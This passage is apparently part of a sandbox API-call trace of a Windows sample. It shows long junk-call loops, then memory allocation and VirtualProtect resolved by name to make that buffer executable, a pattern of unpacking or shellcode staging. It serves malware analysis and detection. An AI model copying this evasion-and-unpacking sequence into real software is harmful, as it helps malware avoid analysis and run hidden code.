lpszDst=0x0, cchDstLength=0x0 | out: lpszDst=0x0) returned 0 [0136.410] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0136.410] CharToOemBuffW (in: lpszSrc=0x0, lpszDst=0x0, cchDstLength=0x0 | out: lpszDst=0x0) returned 0 [0136.410] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0136.410] CharToOemBuffW (in: lpszSrc=0x0, lpszDst=0x0, cchDstLength=0x0 | out: lpszDst=0x0) returned 0 [0136.410] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0136.410] CharToOemBuffW (in: lpszSrc=0x0, lpszDst=0x0, cchDstLength=0x0 | out: lpszDst=0x0) returned 0 [0136.410] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0136.410] CharToOemBuffW (in: lpszSrc=0x0, lpszDst=0x0, cchDstLength=0x0 | out: lpszDst=0x0) returned 0 [0136.410] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0136.410] CharToOemBuffW (in: lpszSrc=0x0, lpszDst=0x0, cchDstLength=0x0 | out: lpszDst=0x0) returned 0 [0136.410] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0136.410] CharToOemBuffW (in: lpszSrc=0x0, lpszDst=0x0, cchDstLength=0x0 | out: lpszDst=0x0) returned 0 [0136.411] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0136.411] CharToOemBuffW (in: lpszSrc=0x0, lpszDst=0x0, cchDstLength=0x0 | out: lpszDst=0x0) returned 0 [0136.411] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0136.411] CharToOemBuffW (in: lpszSrc=0x0, lpszDst=0x0, cchDstLength=0x0 | out: lpszDst=0x0) returned 0 [0136.411] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0136.411] CharToOemBuffW (in: lpszSrc=0x0, lpszDst=0x0, cchDstLength=0x0 | out: lpszDst=0x0) returned 0 [0136.411] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0136.411] CharToOemBuffW (in: lpszSrc=0x0, lpszDst=0x0, cchDstLength=0x0 | out: lpszDst=0x0) returned 0 [0136.411] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0136.411] CharToOemBuffW (in: lpszSrc=0x0, lpszDst=0x0, cchDstLength=0x0 | out: lpszDst=0x0) returned 0 [0136.411] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0136.411] CharToOemBuffW (in: lpszSrc=0x0, lpszDst=0x0, cchDstLength=0x0 | out: lpszDst=0x0) returned 0 [0136.412] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0136.412] CharToOemBuffW (in: lpszSrc=0x0, lpszDst=0x0, cchDstLength=0x0 | out: lpszDst=0x0) returned 0 [0136.412] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0136.412] CharToOemBuffW (in: lpszSrc=0x0, lpszDst=0x0, cchDstLength=0x0 | out: lpszDst=0x0) returned 0 [0136.412] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0136.412] CharToOemBuffW (in: lpszSrc=0x0, lpszDst=0x0, cchDstLength=0x0 | out: lpszDst=0x0) returned 0 [0136.412] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0136.412] CharToOemBuffW (in: lpszSrc=0x0, lpszDst=0x0, cchDstLength=0x0 | out: lpszDst=0x0) returned 0 [0136.412] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0136.412] CharToOemBuffW (in: lpszSrc=0x0, lpszDst=0x0, cchDstLength=0x0 | out: lpszDst=0x0) returned 0 [0136.412] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0136.413] CharToOemBuffW (in: lpszSrc=0x0, lpszDst=0x0, cchDstLength=0x0 | out: lpszDst=0x0) returned 0 [0136.413] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0136.413] CharToOemBuffW (in: lpszSrc=0x0, lpszDst=0x0, cchDstLength=0x0 | out: lpszDst=0x0) returned 0 [0136.413] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0136.413] CharToOemBuffW (in: lpszSrc=0x0, lpszDst=0x0, cchDstLength=0x0 | out: lpszDst=0x0) returned 0 [0136.413] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0136.413] CharToOemBuffW (in: lpszSrc=0x0, lpszDst=0x0, cchDstLength=0x0 | out: lpszDst=0x0) returned 0 [0136.413] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0136.413] CharToOemBuffW (in: lpszSrc=0x0, lpszDst=0x0, cchDstLength=0x0 | out: lpszDst=0x0) returned 0 [0136.413] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0136.413] CharToOemBuffW (in: lpszSrc=0x0, lpszDst=0x0, cchDstLength=0x0 | out: lpszDst=0x0) returned 0 [0136.413] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0136.414] CharToOemBuffW (in: lpszSrc=0x0, lpszDst=0x0, cchDstLength=0x0 | out: lpszDst=0x0) returned 0 [0136.414] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0136.414] CharToOemBuffW (in: lpszSrc=0x0, lpszDst=0x0, cchDstLength=0x0 | out: lpszDst=0x0) returned 0 [0136.414] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0136.414] CharToOemBuffW (in: lpszSrc=0x0, lpszDst=0x0, cchDstLength=0x0 | out: lpszDst=0x0) returned 0 [0136.414] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0136.414] CharToOemBuffW (in: lpszSrc=0x0, lpszDst=0x0, cchDstLength=0x0 | out: lpszDst=0x0) returned 0 [0136.414] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0136.414] CharToOemBuffW (in: lpszSrc=0x0, lpszDst=0x0, cchDstLength=0x0 | out: lpszDst=0x0) returned 0 [0136.414] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0136.414] CharToOemBuffW (in: lpszSrc=0x0, lpszDst=0x0, cchDstLength=0x0 | out: lpszDst=0x0) returned 0 [0136.414] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0136.415] CharToOemBuffW (in: lpszSrc=0x0, lpszDst=0x0, cchDstLength=0x0 | out: lpszDst=0x0) returned 0 [0136.415] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0136.415] CharToOemBuffW (in: lpszSrc=0x0, lpszDst=0x0, cchDstLength=0x0 | out: lpszDst=0x0) returned 0 [0136.415] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0136.415] CharToOemBuffW (in: lpszSrc=0x0, lpszDst=0x0, cchDstLength=0x0 | out: lpszDst=0x0) returned 0 [0136.415] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0136.415] CharToOemBuffW (in: lpszSrc=0x0, lpszDst=0x0, cchDstLength=0x0 | out: lpszDst=0x0) returned 0 [0136.415] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0136.415] CharToOemBuffW (in: lpszSrc=0x0, lpszDst=0x0, cchDstLength=0x0 | out: lpszDst=0x0) returned 0 [0136.415] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0136.415] CharToOemBuffW (in: lpszSrc=0x0, lpszDst=0x0, cchDstLength=0x0 | out: lpszDst=0x0) returned 0 [0136.415] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0136.416] CharToOemBuffW (in: lpszSrc=0x0, lpszDst=0x0, cchDstLength=0x0 | out: lpszDst=0x0) returned 0 [0136.416] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0136.416] CharToOemBuffW (in: lpszSrc=0x0, lpszDst=0x0, cchDstLength=0x0 | out: lpszDst=0x0) returned 0 [0136.416] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0136.416] CharToOemBuffW (in: lpszSrc=0x0, lpszDst=0x0, cchDstLength=0x0 | out: lpszDst=0x0) returned 0 [0136.416] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0136.419] CharToOemBuffW (in: lpszSrc=0x0, lpszDst=0x0, cchDstLength=0x0 | out: lpszDst=0x0) returned 0 [0136.419] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0136.419] CharToOemBuffW (in: lpszSrc=0x0, lpszDst=0x0, cchDstLength=0x0 | out: lpszDst=0x0) returned 0 [0136.419] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0136.420] CharToOemBuffW (in: lpszSrc=0x0, lpszDst=0x0, cchDstLength=0x0 | out: lpszDst=0x0) returned 0 [0136.420] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0136.420] CharToOemBuffW (in: lpszSrc=0x0, lpszDst=0x0, cchDstLength=0x0 | out: lpszDst=0x0) returned 0 [0136.420] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0136.420] CharToOemBuffW (in: lpszSrc=0x0, lpszDst=0x0, cchDstLength=0x0 | out: lpszDst=0x0) returned 0 [0136.420] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0136.420] CharToOemBuffW (in: lpszSrc=0x0, lpszDst=0x0, cchDstLength=0x0 | out: lpszDst=0x0) returned 0 [0136.420] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0136.420] CharToOemBuffW (in: lpszSrc=0x0, lpszDst=0x0, cchDstLength=0x0 | out: lpszDst=0x0) returned 0 [0136.420] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0136.421] CharToOemBuffW (in: lpszSrc=0x0, lpszDst=0x0, cchDstLength=0x0 | out: lpszDst=0x0) returned 0 [0136.421] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0136.421] CharToOemBuffW (in: lpszSrc=0x0, lpszDst=0x0, cchDstLength=0x0 | out: lpszDst=0x0) returned 0 [0136.421] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0136.421] CharToOemBuffW (in: lpszSrc=0x0, lpszDst=0x0, cchDstLength=0x0 | out: lpszDst=0x0) returned 0 [0146.806] LocalAlloc (uFlags=0x0, uBytes=0x1fc28) returned 0x731c48 [0146.828] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76720000 [0146.830] GetProcAddress (hModule=0x76720000, lpProcName="") returned 0x0 [0146.830] LoadLibraryA (lpLibFileName="kernel32.dll") returned 0x76720000 [0146.830] GetProcAddress (hModule=0x76720000, lpProcName="VirtualProtect") returned 0x76737a50 [0146.830] VirtualProtect (in: lpAddress=0x731c48, dwSize=0x1fc28, flNewProtect=0x40, lpflOldProtect=0x19c288 | out: lpflOldProtect=0x19c288*=0x4) returned 1 [0146.837] SetLastError (dwErrCode=0x0) [0146.838] GetLastError () returned 0x0 [0146.838] SetLastError (dwErrCode=0x0) [0146.838] GetLastError () returned 0x0 [0146.838] SetLastError (dwErrCode=0x0) [0146.838] GetLastError () returned 0x0 [0146.838] SetLastError (dwErrCode=0x0) [0146.838] GetLastError () returned 0x0 [0146.838] SetLastError (dwErrCode=0x0) [0146.838] GetLastError () returned 0x0 [0146.838] SetLastError (dwErrCode=0x0) [0146.838] GetLastError () returned 0x0 [0146.838] SetLastError (dwErrCode=0x0) [0146.838] GetLastError () returned 0x0 [0146.838] SetLastError (dwErrCode=0x0) [0146.838] GetLastError () returned 0x0 [0146.838] SetLastError (dwErrCode=0x0) [0146.838] GetLastError () returned 0x0 [0146.838] SetLastError (dwErrCode=0x0) [0146.838] GetLastError () returned 0x0 [0146.838] SetLastError (dwErrCode=0x0) [0146.838] GetLastError () returned 0x0 [0146.838] SetLastError (dwErrCode=0x0) [0146.838] GetLastError () returned 0x0 [0146.838] SetLastError (dwErrCode=0x0) [0146.838] GetLastError () returned 0x0 [0146.867] SetLastError (dwErrCode=0x0) [0146.867] GetLastError () returned 0x0 [0146.867] SetLastError (dwErrCode=0x0) [0146.867] GetLastError () returned 0x0 [0146.867] SetLastError (dwErrCode=0x0) [0146.867] GetLastError () returned 0x0 [0146.867] SetLastError (dwErrCode=0x0) [0146.867] GetLastError () returned 0x0 [0146.867] SetLastError (dwErrCode=0x0) [0146.867] GetLastError () returned 0x0 [0146.867] SetLastError (dwErrCode=0x0) [0146.867] GetLastError () returned 0x0 [0146.867] SetLastError (dwErrCode=0x0) [0146.867] GetLastError () returned 0x0 [0146.867] SetLastError (dwErrCode=0x0) [0146.867] GetLastError () returned 0x0 [0146.867] SetLastError (dwErrCode=0x0) [0146.867] GetLastError () returned 0x0 [0146.867] SetLastError (dwErrCode=0x0) [0146.868] GetLastError () returned 0x0 [0146.868] SetLastError (dwErrCode=0x0) [0146.868] GetLastError () returned 0x0 [0146.868] SetLastError (dwErrCode=0x0) [0146.868] GetLastError () returned 0x0 [0146.868] SetLastError (dwErrCode=0x0) [0146.868] GetLastError () returned 0x0 [0146.868] SetLastError (dwErrCode=0x0) [0146.868] GetLastError () returned 0x0 [0146.868] SetLastError (dwErrCode=0x0) [0146.868] GetLastError () returned 0x0 [0146.868] SetLastError (dwErrCode=0x0) [0146.868] GetLastError () returned 0x0 [0146.868] SetLastError (dwErrCode=0x0) [0146.868] GetLastError () returned 0x0 [0146.868] SetLastError (dwErrCode=0x0) [0146.868] GetLastError () returned 0x0 [0146.868] SetLastError (dwErrCode=0x0) [0146.868] GetLastError () returned 0x0 [0146.868] SetLastError (dwErrCode=0x0) [0146.868] GetLastError () returned 0x0 [0146.868] SetLastError (dwErrCode=0x0) [0146.868] GetLastError () returned 0x0 [0146.868] SetLastError (dwErrCode=0x0) [0146.868] GetLastError () returned 0x0 [0146.868] SetLastError (dwErrCode=0x0) [0146.868] GetLastError () returned 0x0 [0146.868] SetLastError (dwErrCode=0x0) [0146.868] GetLastError () returned 0x0 [0146.868] SetLastError (dwErrCode=0x0) [0146.868] GetLastError () returned 0x0 [0146.868] SetLastError (dwErrCode=0x0) [0146.868] GetLastError () returned 0x0 [0146.868] SetLastError (dwErrCode=0x0) [0146.868] GetLastError () returned 0x0 [0146.868] SetLastError (dwErrCode=0x0) [0146.868] GetLastError () returned 0x0 [0146.868] SetLastError (dwErrCode=0x0) [0146.868] GetLastError () returned 0x0 [0146.868] SetLastError (dwErrCode=0x0) [0146.868] GetLastError () returned 0x0 [0146.869] SetLastError (dwErrCode=0x0) [0146.869] GetLastError () returned 0x0 [0146.869] SetLastError (dwErrCode=0x0) [0146.869] GetLastError () returned 0x0 [0146.869] SetLastError (dwErrCode=0x0) [0146.869] GetLastError () returned 0x0 [0146.869] SetLastError (dwErrCode=0x0) [0146.869] GetLastError () returned 0x0 [0146.869] SetLastError (dwErrCode=0x0) [0146.869] GetLastError () returned 0x0 [0146.869] SetLastError (dwErrCode=0x0) [0146.869] GetLastError () returned 0x0 [0146.869] SetLastError (dwErrCode=0x0) [0146.869] GetLastError () returned 0x0 [0146.869] SetLastError (dwErrCode=0x0) [0146.869] GetLastError () returned 0x0 [0146.869] SetLastError (dwErrCode=0x0) [0146.869] GetLastError () returned 0x0 [0146.869] SetLastError (dwErrCode=0x0) [0146.869] GetLastError () returned 0x0 [0146.869] SetLastError (dwErrCode=0x0) [0146.869] GetLastError () returned 0x0 [0146.869] SetLastError (dwErrCode=0x0) [0146.869] GetLastError () returned 0x0 [0146.869] SetLastError (dwErrCode=0x0) [0146.869] GetLastError () returned 0x0 [0146.869] SetLastError (dwErrCode=0x0) [0146.869] GetLastError () returned 0x0 [0146.869] SetLastError (dwErrCode=0x0) [0146.869] GetLastError () returned 0x0 [0146.869] SetLastError (dwErrCode=0x0) [0146.869] GetLastError () returned 0x0 [0146.869] SetLastError (dwErrCode=0x0) [0146.869] GetLastError () returned 0x0 [0146.869] SetLastError (dwErrCode=0x0) [0146.869] GetLastError () returned 0x0 [0146.869] SetLastError (dwErrCode=0x0) [0146.869] GetLastError () returned 0x0 [0146.870] SetLastError (dwErrCode=0x0) [0146.870] GetLastError () returned 0x0 [0146.870] SetLastError (dwErrCode=0x0) [0146.870] GetLastError () returned 0x0 [0146.870] SetLastError (dwErrCode=0x0) [0146.870] GetLastError () returned 0x0 [0146.870] SetLastError (dwErrCode=0x0) [0146.870] GetLastError () returned 0x0 [0146.870] SetLastError (dwErrCode=0x0) [0146.870] GetLastError () returned 0x0 [0146.870] SetLastError (dwErrCode=0x0) [0146.870] GetLastError () returned 0x0 [0146.870] SetLastError (dwErrCode=0x0) [0146.870] GetLastError () returned 0x0 [0146.870] SetLastError (dwErrCode=0x0) [0146.870] GetLastError () returned 0x0 [0146.870] SetLastError (dwErrCode=0x0) [0146.870] GetLastError () returned 0x0 [0146.870] SetLastError (dwErrCode=0x0) [0146.870] GetLastError () returned 0x0 [0146.870] SetLastError (dwErrCode=0x0) [0146.870] GetLastError () returned 0x0 [0146.870] SetLastError (dwErrCode=0x0) [0146.870] GetLastError () returned 0x0 [0146.870] SetLastError (dwErrCode=0x0) [0146.870] GetLastError () returned 0x0 [0146.870] SetLastError (dwErrCode=0x0) [0146.870] GetLastError () returned 0x0 [0146.870] SetLastError (dwErrCode=0x0) [0146.870] GetLastError () returned 0x0 [0146.870] SetLastError (dwErrCode=0x0) [0146.870] GetLastError () returned 0x0 [0146.870] SetLastError (dwErrCode=0x0) [0146.870] GetLastError () returned 0x0 [0146.870] SetLastError (dwErrCode=0x0) [0146.870] GetLastError () returned 0x0 [0146.870] SetLastError (dwErrCode=0x0) [0146.870] GetLastError () returned 0x0 [0146.870] SetLastError (dwErrCode=0x0) [0146.870] GetLastError () returned 0x0 [0146.870] SetLastError (dwErrCode=0x0) [0146.871] GetLastError () returned 0x0 [0146.871] SetLastError (dwErrCode=0x0) [0146.871] GetLastError () returned 0x0 [0146.871] SetLastError (dwErrCode=0x0) [0146.871] GetLastError () returned 0x0 [0146.871] SetLastError (dwErrCode=0x0) [0146.871] GetLastError () returned 0x0 [0146.871] SetLastError (dwErrCode=0x0) [0146.871] GetLastError () returned 0x0 [0146.871] SetLastError (dwErrCode=0x0) [0146.871] GetLastError () returned 0x0 [0146.871] SetLastError (dwErrCode=0x0) [0146.871] GetLastError () returned 0x0 [0146.871] SetLastError (dwErrCode=0x0) [0146.871] GetLastError () returned 0x0 [0146.871] SetLastError (dwErrCode=0x0) [0146.871] GetLastError () returned 0x0 [0146.871] SetLastError (dwErrCode=0x0) [0146.871] GetLastError () returned 0x0 [0146.871] SetLastError (dwErrCode=0x0) [0146.871] GetLastError () returned 0x0 [0146.871] SetLastError (dwErrCode=0x0) [0146.871] GetLastError () returned 0x0 [0146.871] SetLastError (dwErrCode=0x0) [0146.871] GetLastError () returned 0x0 [0146.871] SetLastError (dwErrCode=0x0) [0146.871] GetLastError () returned 0x0 [0146.871] SetLastError (dwErrCode=0x0) [0146.871] GetLastError () returned 0x0 [0146.871] SetLastError (dwErrCode=0x0) [0146.871] GetLastError () returned 0x0 [0146.871] SetLastError (dwErrCode=0x0) [0146.871] GetLastError () returned 0x0 [0146.871] SetLastError (dwErrCode=0x0) [0146.871] GetLastError () returned 0x0 [0146.871] SetLastError (dwErrCode=0x0) [0146.871] GetLastError () returned 0x0 [0146.871] SetLastError (dwErrCode=0x0) [0146.871] GetLastError () returned 0x0 [0146.872] SetLastError (dwErrCode=0x0) [0146.872] GetLastError () returned 0x0 [0146.872] SetLastError (dwErrCode=0x0) [0146.872] GetLastError () returned 0x0 [0146.872] SetLastError (dwErrCode=0x0) [0146.872] GetLastError () returned 0x0 [0146.872] SetLastError (dwErrCode=0x0) [0146.872] GetLastError () returned 0x0 [0146.872] SetLastError (dwErrCode=0x0) [0146.872] GetLastError () returned 0x0 [0146.872] SetLastError (dwErrCode=0x0) [0146.872] GetLastError () returned 0x0 [0146.872] SetLastError (dwErrCode=0x0) [0146.872] GetLastError () returned 0x0 [0146.872] SetLastError (dwErrCode=0x0) [0146.872] GetLastError () returned 0x0 [0146.872] SetLastError (dwErrCode=0x0) [0146.872] GetLastError () returned 0x0 [0146.872] SetLastError (dwErrCode=0x0) [0146.872] GetLastError () returned 0x0 [0146.872] SetLastError (dwErrCode=0x0) [0146.872] GetLastError () returned 0x0 [0146.872] SetLastError (dwErrCode=0x0) [0146.872] GetLastError () returned 0x0 [0146.872] SetLastError (dwErrCode=0x0) [0146.872] GetLastError () returned 0x0 [0146.872] SetLastError (dwErrCode=0x0) [0146.872] GetLastError () returned 0x0 [0146.872] SetLastError (dwErrCode=0x0) [0146.872] GetLastError () returned 0x0 [0146.872] SetLastError (dwErrCode=0x0) [0146.872] GetLastError () returned 0x0 [0146.872] SetLastError (dwErrCode=0x0) [0146.872] GetLastError () returned 0x0 [0146.872] SetLastError (dwErrCode=0x0) [0146.872] GetLastError () returned 0x0 [0146.872] SetLastError (dwErrCode=0x0) [0146.872] GetLastError () returned 0x0 [0146.872] SetLastError (dwErrCode=0x0) [0146.872] GetLastError () returned 0x0 [0146.872] SetLastError (dwErrCode=0x0) [0146.873] GetLastError () returned 0x0 [0146.873] SetLastError (dwErrCode=0x0) [0146.873] GetLastError () returned 0x0 [0146.873] SetLastError (dwErrCode=0x0) [0146.873] GetLastError () returned 0x0 [0146.873] SetLastError (dwErrCode=0x0) [0146.873] GetLastError () returned 0x0 [0146.873] SetLastError (dwErrCode=0x0) [0146.873] GetLastError () returned 0x0 [0146.873] SetLastError (dwErrCode=0x0) [0146.873] GetLastError () returned 0x0 [0146.873] SetLastError (dwErrCode=0x0) [0146.873] GetLastError () returned 0x0 [0146.873] SetLastError (dwErrCode=0x0) [0146.873] GetLastError () returned 0x0 [0146.873] SetLastError (dwErrCode=0x0) [0146.873] GetLastError () returned 0x0 [0146.873] SetLastError (dwErrCode=0x0) [0146.873] GetLastError () returned 0x0 [0146.873] SetLastError (dwErrCode=0x0) [0146.873] GetLastError () returned 0x0 [0146.873] SetLastError (dwErrCode=0x0) [0146.873] GetLastError () returned 0x0 [0146.873] SetLastError (dwErrCode=0x0) [0146.873] GetLastError () returned 0x0 [0146.873] SetLastError (dwErrCode=0x0) [0146.873] GetLastError () returned 0x0 [0146.873] SetLastError (dwErrCode=0x0) [0146.873] GetLastError () returned 0x0 [0146.873] SetLastError (dwErrCode=0x0) [0146.873] GetLastError () returned 0x0 [0146.873] SetLastError (dwErrCode=0x0) [0146.873] GetLastError () returned 0x0 [0146.873] SetLastError (dwErrCode=0x0) [0146.873] GetLastError () returned 0x0 [0146.873] SetLastError (dwErrCode=0x0) [0146.873] GetLastError () returned 0x0 [0146.873] SetLastError (dwErrCode=0x0) [0146.873] GetLastError () returned 0x0 [0146.873] SetLastError (dwErrCode=0x0) [0146.873] GetLastError () returned 0x0 [0146.874] SetLastError (dwErrCode=0x0) [0146.874] GetLastError () returned 0x0 [0146.874] SetLastError (dwErrCode=0x0) [0146.874] GetLastError () returned 0x0 [0146.874] SetLastError (dwErrCode=0x0) [0146.874] GetLastError () returned 0x0 [0146.874] SetLastError (dwErrCode=0x0) [0146.874] GetLastError () returned 0x0 [0146.874] SetLastError (dwErrCode=0x0) [0146.874] GetLastError () returned 0x0 [0146.874] SetLastError (dwErrCode=0x0) [0146.874] GetLastError () returned 0x0 [0146.874] SetLastError (dwErrCode=0x0) [0146.874] GetLastError () returned 0x0 [0146.874] SetLastError (dwErrCode=0x0) [0146.874] GetLastError () returned 0x0 [0146.874] SetLastError (dwErrCode=0x0) [0146.874] GetLastError () returned 0x0 [0146.874] SetLastError (dwErrCode=0x0) [0146.874] GetLastError () returned 0x0 [0146.874] SetLastError (dwErrCode=0x0) [0146.874] GetLastError () returned 0x0 [0146.874] SetLastError (dwErrCode=0x0) [0146.874] GetLastError () returned 0x0 [0146.874] SetLastError (dwErrCode=0x0) [0146.874] GetLastError () returned 0x0 [0146.874] SetLastError (dwErrCode=0x0) [0146.874] GetLastError () returned 0x0 [0146.874] SetLastError (dwErrCode=0x0) [0146.874] GetLastError () returned 0x0 [0146.874] SetLastError (dwErrCode=0x0) [0146.874] GetLastError () returned 0x0 [0146.874] SetLastError (dwErrCode=0x0) [0146.874] GetLastError () returned 0x0 [0146.874] SetLastError (dwErrCode=0x0) [0146.874] GetLastError () returned 0x0 [0146.874] SetLastError (dwErrCode=0x0) [0146.874] GetLastError () returned 0x0 [0146.874] SetLastError (dwErrCode=0x0) [0146.874] GetLastError () returned 0x0 [0146.874] SetLastError (dwErrCode=0x0) [0146.875] GetLastError () returned 0x0 [0146.875] SetLastError (dwErrCode=0x0) [0146.875] GetLastError () returned 0x0 [0146.875] SetLastError (dwErrCode=0x0) [0146.875] GetLastError () returned 0x0 [0146.875] SetLastError (dwErrCode=0x0) [0146.875] GetLastError () returned 0x0 [0146.875] SetLastError (dwErrCode=0x0) [0146.875] GetLastError () returned 0x0 [0146.875] SetLastError (dwErrCode=0x0) [0146.875] GetLastError () returned 0x0 [0146.875] SetLastError (dwErrCode=0x0) [0146.875] GetLastError () returned 0x0 [0146.875] SetLastError (dwErrCode=0x0) [0146.875] GetLastError () returned 0x0 [0146.875] SetLastError (dwErrCode=0x0) [0146.875] GetLastError () returned 0x0 [0146.875] SetLastError (dwErrCode=0x0) [0146.875] GetLastError () returned 0x0 [0146.875] SetLastError (dwErrCode=0x0) [0146.875] GetLastError () returned 0x0 [0146.875] SetLastError (dwErrCode=0x0) [0146.875] GetLastError () returned 0x0 [0146.875] SetLastError (dwErrCode=0x0) [0146.875] GetLastError () returned 0x0 [0146.875] SetLastError (dwErrCode=0x0) [0146.875] GetLastError () returned 0x0 [0146.875] SetLastError (dwErrCode=0x0) [0146.875] GetLastError () returned 0x0 [0146.875] SetLastError (dwErrCode=0x0) [0146.875] GetLastError () returned 0x0 [0146.875] SetLastError (dwErrCode=0x0) [0146.875] GetLastError () returned 0x0 [0146.875] SetLastError (dwErrCode=0x0) [0146.875] GetLastError () returned 0x0 [0146.875] SetLastError (dwErrCode=0x0) [0146.875] GetLastError () returned 0x0 [0146.875] SetLastError (dwErrCode=0x0) [0146.875] GetLastError () returned 0x0 [0146.875] SetLastError (dwErrCode=0x0) [0146.876] GetLastError () returned 0x0 [0146.876] SetLastError (dwErrCode=0x0) [0146.876] GetLastError () returned 0x0 [0146.876] SetLastError (dwErrCode=0x0) [0146.876] GetLastError () returned 0x0 [0146.876] SetLastError (dwErrCode=0x0) [0146.876] GetLastError () returned 0x0 [0146.876] SetLastError (dwErrCode=0x0) [0146.876] GetLastError () returned 0x0 [0146.876] SetLastError (dwErrCode=0x0) [0146.876] GetLastError () returned 0x0 [0146.876] SetLastError (dwErrCode=0x0) [0146.876] GetLastError () returned 0x0 [0146.876] SetLastError (dwErrCode=0x0) [0146.876] GetLastError () returned 0x0 [0146.876] SetLastError (dwErrCode=0x0) [0146.876] GetLastError () returned 0x0 [0146.876] SetLastError (dwErrCode=0x0) [0146.876] GetLastError () returned 0x0 [0146.876] SetLastError (dwErrCode=0x0) [0146.876] GetLastError () returned 0x0 [0146.876] SetLastError (dwErrCode=0x0) [0146.876] GetLastError () returned 0x0 [0146.876] SetLastError (dwErrCode=0x0) [0146.876] GetLastError () returned 0x0 [0146.876] SetLastError (dwErrCode=0x0) [0146.876] GetLastError () returned 0x0 [0146.876] SetLastError (dwErrCode=0x0) [0146.876] GetLastError () returned 0x0 [0146.876] SetLastError (dwErrCode=0x0) [0146.876] GetLastError () returned 0x0 [0146.876] SetLastError (dwErrCode=0x0) [0146.876] GetLastError () returned 0x0 [0146.876] SetLastError (dwErrCode=0x0) [0146.876] GetLastError () returned 0x0 [0146.876] SetLastError (dwErrCode=0x0) [0146.876] GetLastError () returned 0x0 [0146.876] SetLastError (dwErrCode=0x0) [0146.876] GetLastError () returned 0x0 [0146.876] SetLastError (dwErrCode=0x0) [0146.876] GetLastError () returned 0x0 [0146.877] SetLastError (dwErrCode=0x0) [0146.877] GetLastError () returned 0x0 [0146.877] SetLastError (dwErrCode=0x0) [0146.877] GetLastError () returned 0x0 [0146.877] SetLastError (dwErrCode=0x0) [0146.877] GetLastError () returned 0x0 [0146.877] SetLastError (dwErrCode=0x0) [0146.877] GetLastError () returned 0x0 [0146.877] SetLastError (dwErrCode=0x0) [0146.877] GetLastError () returned 0x0 [0146.877] SetLastError (dwErrCode=0x0) [0146.877] GetLastError () returned 0x0 [0146.877] SetLastError (dwErrCode=0x0) [0146.877] GetLastError () returned 0x0 [0146.877] SetLastError (dwErrCode=0x0) [0146.877] GetLastError () returned 0x0 [0146.877] SetLastError (dwErrCode=0x0) [0146.877] GetLastError () returned 0x0 [0146.877] SetLastError (dwErrCode=0x0) [0146.877] GetLastError () returned 0x0 [0146.877] SetLastError (dwErrCode=0x0) [0146.877] GetLastError () returned 0x0 [0146.877] SetLastError (dwErrCode=0x0) [0146.877] GetLastError () returned 0x0 [0146.877] SetLastError (dwErrCode=0x0) [0146.877] GetLastError () returned 0x0 [0146.877] SetLastError (dwErrCode=0x0) [0146.877] GetLastError () returned 0x0 [0146.877] SetLastError (dwErrCode=0x0) [0146.877] GetLastError () returned 0x0 [0146.877] SetLastError (dwErrCode=0x0) [0146.877] GetLastError () returned 0x0 [0146.877] SetLastError (dwErrCode=0x0) [0146.877] GetLastError () returned 0x0 [0146.877] SetLastError (dwErrCode=0x0) [0146.877] GetLastError () returned 0x0 [0146.877] SetLastError (dwErrCode=0x0) [0146.877] GetLastError () returned 0x0 [0146.877] SetLastError (dwErrCode=0x0) [0146.877] GetLastError () returned 0x0 [0146.878] SetLastError (dwErrCode=0x0) [0146.878] GetLastError () returned 0x0 [0146.878] SetLastError (dwErrCode=0x0) [0146.878] GetLastError () returned 0x0 [0146.878] SetLastError (dwErrCode=0x0) 